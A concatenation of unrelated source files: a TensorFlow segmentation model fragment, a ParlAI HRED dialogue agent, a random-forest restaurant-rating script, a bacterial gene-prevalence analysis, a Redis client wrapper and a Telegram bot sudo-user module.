list(self.input_image_size[::-1]) + [1])
def set_up_sigmoid_pixelwise_loss(self, logits):
"""Sets up the loss function of the model."""
assert self.labels is not None
assert self.loss_weights is not None
pixel_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits,
labels=self.labels)
pixel_loss *= self.loss_weights
self.loss = tf.reduce_mean(pixel_loss)
tf.summary.scalar('pixel_loss', self.loss)
self.loss = tf.verify_tensor_all_finite(self.loss, 'Invalid loss detected')
def set_up_optimizer(self, loss=None, max_gradient_entry_mag=0.7):
"""Sets up the training op for the model."""
if loss is None:
loss = self.loss
tf.summary.scalar('optimizer_loss', self.loss)
opt = optimizer.optimizer_from_flags()
grads_and_vars = opt.compute_gradients(loss)
for g, v in grads_and_vars:
if g is None:
tf.logging.error('Gradient is None: %s', v.op.name)
if max_gradient_entry_mag > 0.0:
grads_and_vars = [(tf.clip_by_value(g,
-max_gradient_entry_mag,
+max_gradient_entry_mag), v)
for g, v, in grads_and_vars]
trainables = tf.trainable_variables()
if trainables:
for var in trainables:
# tf.summary.histogram(var.name.replace(':0', ''), var)
tf.summary.histogram(var.name, var)
for grad, var in grads_and_vars:
# tf.summary.histogram(
# 'gradients/%s' % var.name.replace(':0', ''), grad)
tf.summary.histogram(var.name, grad)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
self.train_op = opt.apply_gradients(grads_and_vars,
global_step=self.global_step,
name='train')
def show_center_slice(self, image, sigmoid=True):
image = image[:, image.get_shape().dims[1] // 2, :, :, :]
if sigmoid:
image = tf.sigmoid(image)
self._images.append(image)
def add_summaries(self):
pass
def update_seed(self, seed, update):
"""Updates the initial 'seed' with 'update'."""
dx = self.input_seed_size[0] - self.pred_mask_size[0]
dy = self.input_seed_size[1] - self.pred_mask_size[1]
dz = self.input_seed_size[2] - self.pred_mask_size[2]
if dx == 0 and dy == 0 and dz == 0:
seed += update
else:
seed += tf.pad(update, [[0, 0],
[dz // 2, dz - dz // 2],
[dy // 2, dy - dy // 2],
[dx // 2, dx - dx // 2],
[0, 0]])
return seed
def define_tf_graph(self):
"""Creates the TensorFlow graph representing the model.
If self.labels is not None, the graph should include operations for
computing and optimizing the loss.
"""
raise NotImplementedError(
'DefineTFGraph needs to be defined by a subclass.')
|
import argparse
import time
import torch.nn.init as init
import torch.optim as optim
from torch.utils.data import DataLoader
from parlai.core.torch_generator_agent import TorchGeneratorAgent, PPLMetric
from parlai.core.torch_agent import Batch
from parlai.utils.misc import warn_once
from .modules import *
from .util import *
from collections import Counter, namedtuple
from parlai.core.metrics import SumMetric, AverageMetric, BleuMetric, FairseqBleuMetric
use_cuda = torch.cuda.is_available()
torch.manual_seed(123)
np.random.seed(123)
if use_cuda:
torch.cuda.manual_seed(123)
### Begin Harshal code
# This code is not used for now.
def get_args():
parser = argparse.ArgumentParser(description='HRED parameter options')
parser.add_argument('-n', dest='name', help='enter suffix for model files', required=True)
parser.add_argument('-e', dest='epoch', type=int, default=20, help='number of epochs')
parser.add_argument('-pt', dest='patience', type=int, default=-1, help='validtion patience for early stopping default none')
parser.add_argument('-tc', dest='teacher', action='store_true', default=False, help='default teacher forcing')
parser.add_argument('-bi', dest='bidi', action='store_true', default=False, help='bidirectional enc/decs')
parser.add_argument('-test', dest='test', action='store_true', default=False, help='only test or inference')
parser.add_argument('-shrd_dec_emb', dest='shrd_dec_emb', action='store_true', default=False, help='shared embedding in/out for decoder')
parser.add_argument('-btstrp', dest='btstrp', default=None, help='bootstrap/load parameters give name')
parser.add_argument('-lm', dest='lm', action='store_true', default=False, help='enable a RNN language model joint training as well')
parser.add_argument('-toy', dest='toy', action='store_true', default=False, help='loads only 1000 training and 100 valid for testing')
parser.add_argument('-pretty', dest='pretty', action='store_true', default=False, help='pretty print inference')
parser.add_argument('-mmi', dest='mmi', action='store_true', default=False, help='Using the mmi anti-lm for ranking beam')
parser.add_argument('-drp', dest='drp', type=float, default=0.3, help='dropout probability used all throughout')
parser.add_argument('-nl', dest='num_lyr', type=int, default=1, help='number of enc/dec layers(same for both)')
parser.add_argument('-lr', dest='lr', type=float, default=0.001, help='learning rate for optimizer')
parser.add_argument('-bs', dest='bt_siz', type=int, default=100, help='batch size')
parser.add_argument('-bms', dest='beam', type=int, default=1, help='beam size for decoding')
parser.add_argument('-vsz', dest='vocab_size', type=int, default=10005, help='size of vocabulary')
parser.add_argument('-esz', dest='emb_size', type=int, default=300, help='embedding size enc/dec same')
parser.add_argument('-uthid', dest='ut_hid_size', type=int, default=600, help='encoder utterance hidden state')
parser.add_argument('-seshid', dest='ses_hid_size', type=int, default=1200, help='encoder session hidden state')
parser.add_argument('-dechid', dest='dec_hid_size', type=int, default=600, help='decoder hidden state')
return parser.parse_args()
def init_param(model):
for name, param in model.named_parameters():
# skip over the embeddings so that the padding index ones are 0
if 'embed' in name:
continue
elif ('rnn' in name or 'lm' in name) and len(param.size()) >= 2:
init.orthogonal(param)
else:
init.normal(param, 0, 0.01)
def clip_gnorm(model):
for name, p in model.named_parameters():
param_norm = p.grad.data.norm()
if param_norm > 1:
p.grad.data.mul_(1/param_norm)
def train(options, model):
model.train()
optimizer = optim.Adam(model.parameters(), options.lr)
if options.btstrp:
load_model_state(model, options.btstrp + "_mdl.pth")
load_model_state(optimizer, options.btstrp + "_opti_st.pth")
else:
init_param(model)
if options.toy:
train_dataset, valid_dataset = MovieTriples('train', 1000), MovieTriples('valid', 100)
else:
train_dataset, valid_dataset = MovieTriples('train'), MovieTriples('valid')
train_dataloader = DataLoader(train_dataset, batch_size=options.bt_siz, shuffle=True, num_workers=2,
collate_fn=custom_collate_fn)
valid_dataloader = DataLoader(valid_dataset, batch_size=options.bt_siz, shuffle=True, num_workers=2,
collate_fn=custom_collate_fn)
print("Training set {} Validation set {}".format(len(train_dataset), len(valid_dataset)))
criteria = nn.CrossEntropyLoss(ignore_index=10003, size_average=False)
if use_cuda:
criteria.cuda()
best_vl_loss, patience, batch_id = 10000, 0, 0
for i in range(options.epoch):
if patience == options.patience:
break
tr_loss, tlm_loss, num_words = 0, 0, 0
strt = time.time()
for i_batch, sample_batch in enumerate(tqdm(train_dataloader)):
new_tc_ratio = 2100.0/(2100.0 + math.exp(batch_id/2100.0))
model.dec.set_tc_ratio(new_tc_ratio)
preds, lmpreds = model(sample_batch)
u3 = sample_batch[4]
if use_cuda:
u3 = u3.cuda()
preds = preds[:, :-1, :].contiguous().view(-1, preds.size(2))
u3 = u3[:, 1:].contiguous().view(-1)
loss = criteria(preds, u3)
target_toks = u3.ne(10003).long().sum().data[0]
num_words += target_toks
tr_loss += loss.data[0]
loss = loss/target_toks
if options.lm:
lmpreds = lmpreds[:, :-1, :].contiguous().view(-1, lmpreds.size(2))
lm_loss = criteria(lmpreds, u3)
tlm_loss += lm_loss.data[0]
lm_loss = lm_loss/target_toks
optimizer.zero_grad()
loss.backward(retain_graph=True)
if options.lm:
lm_loss.backward()
clip_gnorm(model)
optimizer.step()
batch_id += 1
vl_loss = calc_valid_loss(valid_dataloader, criteria, model)
print("Training loss {} lm loss {} Valid loss {}".format(tr_loss/num_words, tlm_loss/num_words, vl_loss))
print("epoch {} took {} mins".format(i+1, (time.time() - strt)/60.0))
print("tc ratio", model.dec.get_tc_ratio())
if vl_loss < best_vl_loss or options.toy:
torch.save(model.state_dict(), options.name + '_mdl.pth')
torch.save(optimizer.state_dict(), options.name + '_opti_st.pth')
best_vl_loss = vl_loss
patience = 0
else:
patience += 1
def load_model_state(mdl, fl):
saved_state = torch.load(fl)
mdl.load_state_dict(saved_state)
def sort_key(temp, mmi):
if mmi:
lambda_param = 0.25
return temp[1] - lambda_param*temp[2] + len(temp[0])*0.1
else:
return temp[1]/len(temp[0])**0.7
def get_sent_ll(u3, u3_lens, model, criteria, ses_encoding):
preds, _ = model.dec([ses_encoding, u3, u3_lens])
preds = preds[:, :-1, :].contiguous().view(-1, preds.size(2))
u3 = u3[:, 1:].contiguous().view(-1)
loss = criteria(preds, u3).data[0]
target_toks = u3.ne(10003).long().sum().data[0]
return -1*loss/target_toks
# sample a sentence from the test set by using beam search
def inference_beam(dataloader, model, inv_dict, options):
criteria = nn.CrossEntropyLoss(ignore_index=10003, size_average=False)
if use_cuda:
criteria.cuda()
cur_tc = model.dec.get_teacher_forcing()
model.dec.set_teacher_forcing(True)
fout = open(options.name + "_result.txt",'w')
load_model_state(model, options.name + "_mdl.pth")
model.eval()
test_ppl = calc_valid_loss(dataloader, criteria, model)
print("test preplexity is:{}".format(test_ppl))
for i_batch, sample_batch in enumerate(dataloader):
u1, u1_lens, u2, u2_lens, u3, u3_lens = sample_batch[0], sample_batch[1], sample_batch[2], sample_batch[3], \
sample_batch[4], sample_batch[5]
if use_cuda:
u1 = u1.cuda()
u2 = u2.cuda()
u3 = u3.cuda()
o1, o2 = model.base_enc((u1, u1_lens)), model.base_enc((u2, u2_lens))
qu_seq = torch.cat((o1, o2), 1)
# if we need to decode the intermediate queries we may need the hidden states
final_session_o = model.ses_enc(qu_seq)
# forward(self, ses_encoding, x=None, x_lens=None, beam=5 ):
for k in range(options.bt_siz):
sent = generate(model, final_session_o[k, :, :].unsqueeze(0), options)
pt = tensor_to_sent(sent, inv_dict)
# greedy true for below because only beam generates a tuple of sequence and probability
gt = tensor_to_sent(u3[k, :].unsqueeze(0).data.cpu().numpy(), inv_dict, True)
fout.write(str(gt[0]) + " | " + str(pt[0][0]) + "\n")
fout.flush()
if not options.pretty:
print(pt)
print("Ground truth {} {} \n".format(gt, get_sent_ll(u3[k, :].unsqueeze(0), u3_lens[k:k+1], model, criteria, final_session_o)))
else:
print(gt[0], "|", pt[0][0])
model.dec.set_teacher_forcing(cur_tc)
fout.close()
def calc_valid_loss(data_loader, criteria, model):
model.eval()
cur_tc = model.dec.get_teacher_forcing()
model.dec.set_teacher_forcing(True)
# we want to find the perplexity or likelihood of the provided sequence
valid_loss, num_words = 0, 0
for i_batch, sample_batch in enumerate(tqdm(data_loader)):
preds, lmpreds = model(sample_batch)
u3 = sample_batch[4]
if use_cuda:
u3 = u3.cuda()
preds = preds[:, :-1, :].contiguous().view(-1, preds.size(2))
u3 = u3[:, 1:].contiguous().view(-1)
# do not include the lM loss, exp(loss) is perplexity
loss = criteria(preds, u3)
num_words += u3.ne(10003).long().sum().data[0]
valid_loss += loss.data[0]
model.train()
model.dec.set_teacher_forcing(cur_tc)
return valid_loss/num_words
def data_to_seq():
# we use a common dict for all test, train and validation
_dict_file = '/home/harshals/hed-dlg/Data/MovieTriples/Training.dict.pkl'
with open(_dict_file, 'rb') as fp2:
dict_data = pickle.load(fp2)
# dictionary data is like ('</s>', 2, 588827, 785135)
# so i believe that the first is the ids are assigned by frequency
# thinking to use a counter collection out here maybe
inv_dict, vocab_dict = {}, {}
for x in dict_data:
tok, f, _, _ = x
inv_dict[f] = tok
vocab_dict[tok] = f
_file = '/data2/chatbot_eval_issues/results/AMT_NCM_Test_NCM_Joao/neural_conv_model_eval_source.txt'
with open(_file, 'r') as fp:
all_seqs = []
for lin in fp.readlines():
seq = list()
seq.append(1)
for wrd in lin.split(" "):
if wrd not in vocab_dict:
seq.append(0)
else:
seq_id = vocab_dict[wrd]
seq.append(seq_id)
seq.append(2)
all_seqs.append(seq)
with open('CustomTest.pkl', 'wb') as handle:
pickle.dump(all_seqs, handle, protocol=pickle.HIGHEST_PROTOCOL)
# End Harshal code
class HredAgent(TorchGeneratorAgent):
# lm = True
@classmethod
def add_cmdline_args(cls, argparser):
"""
Add command-line arguments specifically for this agent.
"""
agent = argparser.add_argument_group('HRED Arguments')
agent.add_argument('-e', dest='epoch', type=int, default=20, help='number of epochs')
agent.add_argument('-pt', dest='patience', type=int, default=-1, help='validtion patience for early stopping default none')
agent.add_argument('-tc', dest='teacher', action='store_true', default=False, help='default teacher forcing')
agent.add_argument('-bi', dest='bidi', action='store_true', default=False, help='bidirectional enc/decs')
agent.add_argument('-test', dest='test', action='store_true', default=False, help='only test or inference')
agent.add_argument('-shrd_dec_emb', dest='shrd_dec_emb', action='store_true', default=False, help='shared embedding in/out for decoder')
agent.add_argument('-btstrp', dest='btstrp', default=None, help='bootstrap/load parameters give name')
agent.add_argument('-lm', dest='lm', action='store_true', default=False, help='enable a RNN language model joint training as well')
agent.add_argument('-toy', dest='toy', action='store_true', default=False, help='loads only 1000 training and 100 valid for testing')
agent.add_argument('-pretty', dest='pretty', action='store_true', default=False, help='pretty print inference')
agent.add_argument('-mmi', dest='mmi', action='store_true', default=False, help='Using the mmi anti-lm for ranking beam')
agent.add_argument('-drp', dest='drp', type=float, default=0.3, help='dropout probability used all throughout')
agent.add_argument('-nl', dest='num_lyr', type=int, default=1, help='number of enc/dec layers(same for both)')
agent.add_argument('-lr', dest='lr', type=float, default=0.001, help='learning rate for optimizer')
agent.add_argument('-bs', dest='bt_siz', type=int, default=100, help='batch size')
agent.add_argument('-bms', dest='beam', type=int, default=1, help='beam size for decoding')
agent.add_argument('-vsz', dest='vocab_size', type=int, default=1008, help='size of vocabulary')
agent.add_argument('-esz', dest='emb_size', type=int, default=300, help='embedding size enc/dec same')
agent.add_argument('-uthid', dest='ut_hid_size', type=int, default=600, help='encoder utterance hidden state')
agent.add_argument('-seshid', dest='ses_hid_size', type=int, default=1200, help='encoder session hidden state')
agent.add_argument('-dechid', dest='dec_hid_size', type=int, default=600, help='decoder hidden state')
super(HredAgent, cls).add_cmdline_args(argparser)
return agent
@staticmethod
def model_version():
"""
Return current version of this model, counting up from 0.
Models may not be backwards-compatible with older versions. Version 1 split from
version 0 on Aug 29, 2018. Version 2 split from version 1 on Nov 13, 2018 To use
version 0, use --model legacy:seq2seq:0 To use version 1, use --model
legacy:seq2seq:1 (legacy agent code is located in parlai/agents/legacy_agents).
"""
return 2
def __init__(self, opt, shared=None):
"""
Set up model.
"""
super().__init__(opt, shared)
self.id = 'HRED'
def build_model(self, states=None):
"""
Initialize model, override to change model setup.
"""
opt = self.opt
if not states:
states = {}
options_type = namedtuple('Options', ' '.join(list(opt.keys())))
# import pdb; pdb.set_trace()
model = HRED(options_type(**opt))
model.dec.set_tc_ratio(0.0) # Let's not use teacher forcing
if opt.get('dict_tokenizer') == 'bpe' and opt['embedding_type'] != 'random':
print('skipping preinitialization of embeddings for bpe')
elif not states and opt['embedding_type'] != 'random':
# `not states`: only set up embeddings if not loading model
self._copy_embeddings(model.decoder.lt.weight, opt['embedding_type'])
if opt['lookuptable'] in ['unique', 'dec_out']:
# also set encoder lt, since it's not shared
self._copy_embeddings(
model.encoder.lt.weight, opt['embedding_type'], log=False
)
if states:
# set loaded states if applicable
model.load_state_dict(states['model'])
if opt['embedding_type'].endswith('fixed'):
print('Seq2seq: fixing embedding weights.')
model.decoder.lt.weight.requires_grad = False
model.encoder.lt.weight.requires_grad = False
if opt['lookuptable'] in ['dec_out', 'all']:
model.output.weight.requires_grad = False
return model
def build_criterion(self):
# set up criteria
if self.opt.get('numsoftmax', 1) > 1:
return nn.NLLLoss(ignore_index=self.NULL_IDX, reduction='none')
else:
return nn.CrossEntropyLoss(ignore_index=self.NULL_IDX, reduction='none')
def compute_loss(self, batch, return_output=False):
"""
Compute and return the loss for the given batch.
Easily overridable for customized loss functions.
If return_output is True, the full output from the call to self.model()
is also returned, via a (loss, model_output) pair.
"""
# print('Computing loss on batch', batch['u1'].shape)
if batch.label_vec is None:
raise ValueError('Cannot compute loss without a label.')
model_output = self.model(self._model_input(batch))
scores, preds, *_ = model_output
# import pdb; pdb.set_trace()
preds = torch.argmax(scores, dim=2)
score_view = scores.view(-1, scores.size(-1))
loss = self.criterion(score_view, batch.label_vec.view(-1))
loss = loss.view(scores.shape[:-1]).sum(dim=1)
# save loss to metrics
notnull = batch.label_vec.ne(self.NULL_IDX)
target_tokens = notnull.long().sum(dim=-1)
correct = ((batch.label_vec == preds) * notnull).sum(dim=-1)
self.record_local_metric('loss', AverageMetric.many(loss, target_tokens))
self.record_local_metric('ppl', PPLMetric.many(loss, target_tokens))
self.record_local_metric(
'token_acc', AverageMetric.many(correct, target_tokens)
)
# actually do backwards loss
loss = loss.sum()
loss /= target_tokens.sum() # average loss per token
if return_output:
return (loss, model_output)
else:
return loss
def train_step(self, batch):
if 'label_vec' not in batch or batch['label_vec'] is None:
return
super().train_step(batch)
def _dummy_batch(self, batchsize, maxlen):
"""
Create a dummy batch.
This is used to preinitialize the cuda buffer, or otherwise force a
null backward pass after an OOM.
If your model uses additional inputs beyond text_vec and label_vec,
you will need to override it to add additional fields.
"""
b = Batch(
text_vec=torch.ones(batchsize, maxlen).long().cuda(),
label_vec=torch.ones(batchsize, maxlen).long().cuda(),
text_lengths=[maxlen] * batchsize,
)
b['u1'] = b['text_vec']
b['u2'] = b['text_vec']
b['u3'] = b['text_vec']
b['u1_lens'] = b['text_lengths']
b['u2_lens'] = b['text_lengths']
b['u3_lens'] = b['text_lengths']
return b
def batchify(self, *args, **kwargs):
"""
Override batchify options for seq2seq.
"""
kwargs['sort'] = True # need sorted for pack_padded
b = super().batchify(*args, **kwargs)
u1s, u2s, u3s = [], [], []
if self.is_training:
for observation in b['observations']:
tvec = observation['text_vec']
indices = [i for i, x in enumerate(tvec) if x == self.dict['</s>']]
try:
u1s.append(torch.LongTensor(tvec[1:indices[0]]).reshape(-1))
u2s.append(torch.LongTensor(tvec[indices[0]+2:indices[1]]).reshape(-1))
u3s.append(torch.LongTensor(tvec[indices[1]+2:indices[2]]).reshape(-1))
except IndexError:
return Batch()
# in case of invalid triple
if len(u1s[-1]) <= 0 or len(u2s[-1]) <= 0 or len(u3s[-1]) <= 0:
return Batch()
else:
if len(self.history.history_vecs) >= 2:
u1s = [self.history.history_vecs[-2]]
u2s = [self.history.history_vecs[-1]]
u3s = [[self.dict['hello']]]
elif len(self.history.history_vecs) >=1:
u1s = [[self.dict['hello']]]
u2s = [self.history.history_vecs[-1]]
u3s = [[self.dict['hello']]]
# print('u1s',len(u1s),'u2s',len(u2s),'u3s',len(u3s))
# print('u1s lens ', [x.size(0) for x in u1s])
# print('u2s lens ', [x.size(0) for x in u2s])
# print('u3s lens ', [x.size(0) for x in u3s])
u1, u1_lens = self._pad_tensor(u1s)
u2, u2_lens = self._pad_tensor(u2s)
u3, u3_lens = self._pad_tensor(u3s)
# print('u1 ITEM ', u1.max().item())
# print('u2 ITEM ', u2.max().item())
# print('u3 ITEM ', u3.max().item())
b['label_vec'] = u3
b['u1'] = u1
b['u1_lens'] = u1_lens
b['u2'] = u2
b['u2_lens'] = u2_lens
b['u3'] = u3
b['u3_lens'] = u3_lens
if u1 is None or u2 is None or u3 is None:
return Batch()
return b
def _set_text_vec(self, obs, history, truncate):
return super()._set_text_vec(obs, history, truncate)
def _model_input(self, batch):
u1, u2, u3 = batch['u1'], batch['u2'], batch['u3']
u1_lens, u2_lens, u3_lens = batch['u1_lens'], batch['u2_lens'], batch['u3_lens']
return (u1, u1_lens, u2, u2_lens, u3, u3_lens)
def _encoder_input(self, batch):
return (torch.LongTensor(batch.u1).reshape(1,-1), torch.LongTensor(batch.u2).reshape(1,-1), )
def _generate(self, batch, beam_size, max_ts):
"""
Generate an output with beam search.
Depending on the options, this may perform greedy/topk/nucleus generation.
:param Batch batch:
Batch structure with input and labels
:param int beam_size:
Size of each beam during the search
:param int max_ts:
the maximum length of the decoded sequence
:return:
tuple (beam_pred_scores, n_best_pred_scores, beams)
- beam_preds_scores: list of (prediction, score) pairs for each sample in
Batch
- n_best_preds_scores: list of n_best list of tuples (prediction, score)
for each sample from Batch
- beams :list of Beam instances defined in Beam class, can be used for any
following postprocessing, e.g. dot logging.
"""
model = self.model
u1, u1_lens, u2, u2_lens, u3, u3_lens = self._model_input(batch)
bt_siz = u1.size(0)
if use_cuda:
u1 = u1.cuda()
u2 = u2.cuda()
u3 = u3.cuda()
o1, o2 = model.base_enc((u1, u1_lens)), model.base_enc((u2, u2_lens))
qu_seq = torch.cat((o1, o2), 1)
# if we need to decode the intermediate queries we may need the hidden states
final_session_o = model.ses_enc(qu_seq)
# forward(self, ses_encoding, x=None, x_lens=None, beam=5 ):
for k in range(bt_siz):
sent = self.generate(final_session_o[k, :, :].unsqueeze(0), beam_size)
# pt = tensor_to_sent(sent, inv_dict)
# # greedy true for below because only beam generates a tuple of sequence and probability
# gt = tensor_to_sent(u3[k, :].unsqueeze(0).data.cpu().numpy(), inv_dict, True)
# fout.write(str(gt[0]) + " | " + str(pt[0][0]) + "\n")
# fout.flush()
# if not options.pretty:
# print(pt)
# print("Ground truth {} {} \n".format(gt, get_sent_ll(u3[k, :].unsqueeze(0), u3_lens[k:k+1], model, criteria, final_session_o)))
# else:
# print(gt[0], "|", pt[0][0])
return sent, sent
def generate(self, ses_encoding, beam):
diversity_rate = 2
antilm_param = 10
n_candidates, final_candids = [], []
candidates = [([1], 0, 0)]
gen_len, max_gen_len = 1, 20
# we provide the top k options/target defined each time
while gen_len <= max_gen_len:
for c in candidates:
seq, pts_score, pt_score = c[0], c[1], c[2]
_target = Variable(torch.LongTensor([seq]), volatile=True)
dec_o, dec_lm = self.model.dec([ses_encoding, _target, [len(seq)]])
# import pdb; pdb.set_trace()
dec_o = dec_o[:, :, :-1]
op = F.log_softmax(dec_o, 2, 5)
op = op[:, -1, :]
topval, topind = op.topk(beam, 1)
if self.model.options.lm:
dec_lm = dec_lm[:, :, :-1]
lm_op = F.log_softmax(dec_lm, 2, 5)
lm_op = lm_op[:, -1, :]
for i in range(beam):
ctok, cval = topind.data[0, i], topval.data[0, i]
if self.model.options.lm:
uval = lm_op.data[0, ctok]
if dec_lm.size(1) > antilm_param:
uval = 0.0
else:
uval = 0.0
if ctok == 2:
list_to_append = final_candids
else:
list_to_append = n_candidates
list_to_append.append((seq + [ctok], pts_score + cval - diversity_rate*(i+1), pt_score + uval))
n_candidates.sort(key=lambda temp: sort_key(temp, self.model.options.mmi), reverse=True)
candidates = copy.copy(n_candidates[:beam])
n_candidates[:] = []
gen_len += 1
final_candids = final_candids + candidates
final_candids = [(x, y) for x,y, _ in final_candids]
# final_candids = [(temp, sort_key(temp, self.model.options.mmi)) for temp in final_candids]
final_candids = sorted(final_candids, key=lambda x: -x[1])
return final_candids[:beam]
def state_dict(self):
"""
Get the model states for saving.
Overriden to include longest_label
"""
states = super().state_dict()
# if hasattr(self.model, 'module'):
# states['longest_label'] = self.model.module.longest_label
# else:
# states['longest_label'] = self.model.longest_label
return states
def load(self, path):
"""
Return opt and model states.
"""
states = torch.load(path, map_location=lambda cpu, _: cpu)
# set loaded states if applicable
self.model.load_state_dict(states['model'])
if 'longest_label' in states:
self.model.longest_label = states['longest_label']
return states
def is_valid(self, obs):
normally_valid = super().is_valid(obs)
if not normally_valid:
# shortcut boolean evaluation
return normally_valid
contains_empties = obs['text_vec'].shape[0] == 0
if self.is_training and contains_empties:
warn_once(
'seq2seq got an empty input sequence (text_vec) during training. '
'Skipping this example, but you should check your dataset and '
'preprocessing.'
)
elif not self.is_training and contains_empties:
warn_once(
'seq2seq got an empty input sequence (text_vec) in an '
'evaluation example! This may affect your metrics!'
)
return not contains_empties
|
#!/usr/bin/env python3
from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
from time import time
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from user_processing import get_users
from place_processing import get_places
from transforms import transform_coords, transform_payments, transform_cuisines
def example_all_ratings():
seed = int(time()) #42
np.random.seed(seed)
# load dataframes
user_df = get_users()
places_df = get_places()
ratings_df = pd.read_csv("data/rating_final.csv", encoding='utf-8')\
.drop(columns=['food_rating', 'service_rating'])
# merge all tables together
df = ratings_df.merge(user_df, how='inner', on='userID') \
.merge(places_df, how='inner', on='placeID')
df = transform_cuisines(df)
df = transform_payments(df)
df = transform_coords(df)
# drop row identifiers
df.drop(columns=['userID', 'placeID'], inplace=True)
x = df.drop(columns=['rating'])
y = df.rating
means = []
for i in range(100):
# split dataset
xtrain, xtest, ytrain, ytest = train_test_split(x, y, train_size=0.9)
# train classifier
clf = RandomForestClassifier(n_estimators=50)
clf.fit(xtrain, ytrain)
# evaluate classifier
predictions = clf.predict(xtest)
errors = np.array(abs(predictions - ytest))
mean = np.mean(errors.flatten())
means.append(mean)
mean = np.mean(means)
std = np.std(means)
print("Mean:", mean, "\nStd:", std)
print(means)
#print('Mean Absolute Error: \"', round(np.mean(errors), 2), '\".')
# print(list((xtest, predictions, ytest))[:10])
features = x.columns
importances = clf.feature_importances_
indices = np.argsort(importances)
# filter by importances > 0
features = np.array([features[index] for index in indices if importances[index] > 0])[-10:]
importances = np.array([importances[index] for index in indices if importances[index] > 0])[-10:]
# show feature importance plot
plt.barh(range(len(importances)), importances[:], color='b', align='center')
plt.yticks(range(len(features)), features)
#plt.title('Feature Importances')
#plt.xlabel('Relative Importance')
plt.tight_layout()
plt.show()
example_all_ratings()
|
import pandas as pd
computed = pd.read_table('cold/sample.computed.tsv', index_col=0)
mapped = computed.insertsHQ
biome = pd.read_table('../../gmgc.analysis/cold/biome.txt', squeeze=True, index_col=0)
bactNOG = pd.read_feather('tables/bactNOGS.unique.feather', nthreads=24)
bactNOG.set_index('index', inplace=True)
bactDetect = bactNOG > 0
bsel = bactDetect.T[mapped > 1e6]
biome = biome.reindex(bsel.index)
bactprevs = {}
for b in set(biome.values):
bactprevs[b] = bsel.loc[biome==b].mean()
print(f'Done {b}')
bactprevs['all'] = bsel.mean()
bactprevs['genomes' ] = pd.read_table('outputs/genomic.relative.txt', index_col=0, squeeze=True)
bactprevs = pd.DataFrame(bactprevs)
bactprevs.to_csv('tables/bactNOGS.prevalence.tsv', sep='\t')
if False:
rare = bp.genomes <.1
bp = bactprevs
rare = bp.genomes <.1
for c in bp.columns:
print(c,(bp[c] > .9).sum(), (rare & (bp[c] > .9)).sum())
ball = bsel.mean()
commcore = ball[((ball > .9) & rare)].copy()
commcore.sort_values()
commcore = ball[((ball > .9) & rare)].copy().sort_values()
info = pd.read_table('bactNOG.annotations.tsv.gz', header=None, index_col=1)
info.loc[commcore.index.map(lambda c: 'ENOG41'+c.split('@')[0])]
urare =info.loc[commcore.index.map(lambda c: 'ENOG41'+c.split('@')[0])]
info.loc[commcore.index.map(lambda c: 'ENOG41'+c.split('@')[0])].values
info.loc[commcore.index.map(lambda c: 'ENOG41'+c.split('@')[0])]
bp['genome'][commcore.index]
bp['genomes'][commcore.index]
genomes = bp['genomes'][commcore.index]
data = pd.DataFrame({'metagenomes': commcore, 'genomes' : bp.genomes[commcore.index]})
data = data.sort_values(by='metagenomes', ascending=False)
info.loc[data.index.map(lambda c: 'ENOG41'+c.split('@')[0])]
info.loc[data.index.map(lambda c: 'ENOG41'+c.split('@')[0])][5]
info.loc[data.index.map(lambda c: 'ENOG41'+c.split('@')[0])][5].values
data['name'] = info.loc[data.index.map(lambda c: 'ENOG41'+c.split('@')[0])][5].values
open('test.html', 'wt').write(data.to_html())
|
'''The :mod:`stdnet.backends.redisb.client` implements several extensions
to the standard redis client in redis-py_
Client
~~~~~~~~~~~~~~
.. autoclass:: Redis
:members:
:member-order: bysource
Prefixed Client
~~~~~~~~~~~~~~~~~~
.. autoclass:: PrefixedRedis
:members:
:member-order: bysource
RedisScript
~~~~~~~~~~~~~~~
.. autoclass:: RedisScript
:members:
:member-order: bysource
'''
import os
import io
import socket
from copy import copy
from .extensions import RedisExtensionsMixin, redis, BasePipeline
from .prefixed import PrefixedRedisMixin
class Redis(RedisExtensionsMixin, redis.StrictRedis):
@property
def encoding(self):
return self.connection_pool.connection_kwargs.get('encoding', 'utf-8')
def address(self):
kw = self.connection_pool.connection_kwargs
return (kw['host'], kw['port'])
def prefixed(self, prefix):
'''Return a new :class:`PrefixedRedis` client.
'''
return PrefixedRedis(self, prefix)
def pipeline(self, transaction=True, shard_hint=None):
return Pipeline(
self,
transaction,
shard_hint)
class PrefixedRedis(PrefixedRedisMixin, Redis):
pass
class Pipeline(BasePipeline, Redis):
def __init__(self, client, transaction, shard_hint):
self.client = client
self.response_callbacks = client.response_callbacks
self.transaction = transaction
self.shard_hint = shard_hint
self.watching = False
self.connection = None
self.reset()
@property
def connection_pool(self):
return self.client.connection_pool
@property
def is_pipeline(self):
return True
|
import html
from typing import List
from telegram import Update, Bot
from telegram.ext import CommandHandler, Filters
from telegram.ext.dispatcher import run_async
from tg_bot import dispatcher, SUDO_USERS, OWNER_USERNAME, OWNER_ID
from tg_bot.modules.helper_funcs.extraction import extract_user
from tg_bot.modules.helper_funcs.chat_status import bot_admin
@bot_admin
@run_async
def sudopromote(bot: Bot, update: Update, args: List[str]):
message = update.effective_message
banner = update.effective_user
user_id = extract_user(message, args)
if not user_id:
message.reply_text("You don't seem to be referring to a user.")
return ""
if int(user_id) == OWNER_ID:
message.reply_text("The specified user is my owner! No need add him to SUDO_USERS list!")
return ""
if int(user_id) in SUDO_USERS:
message.reply_text("The user is already a sudo user.")
return ""
with open("sudo_users.txt","a") as file:
file.write(str(user_id) + "\n")
SUDO_USERS.append(user_id)
message.reply_text("Succefully added to SUDO user list!")
return ""
@bot_admin
@run_async
def sudodemote(bot: Bot, update: Update, args: List[str]):
message = update.effective_message
user_id = extract_user(message, args)
if not user_id:
message.reply_text("You don't seem to be referring to a user.")
return ""
if int(user_id) == OWNER_ID:
message.reply_text("The specified user is my owner! I won't remove him from SUDO_USERS list!")
return ""
if user_id not in SUDO_USERS:
message.reply_text("{} is not a sudo user".format(user_id))
return ""
users = [line.rstrip('\n') for line in open("sudo_users.txt")]
with open("sudo_users.txt","w") as file:
for user in users:
if not int(user) == user_id:
file.write(str(user) + "\n")
SUDO_USERS.remove(user_id)
message.reply_text("Succefully removed from SUDO user list!")
return ""
__help__ = """
*Bot owner only:*
- /sudopromote: promotes the user to SUDO USER
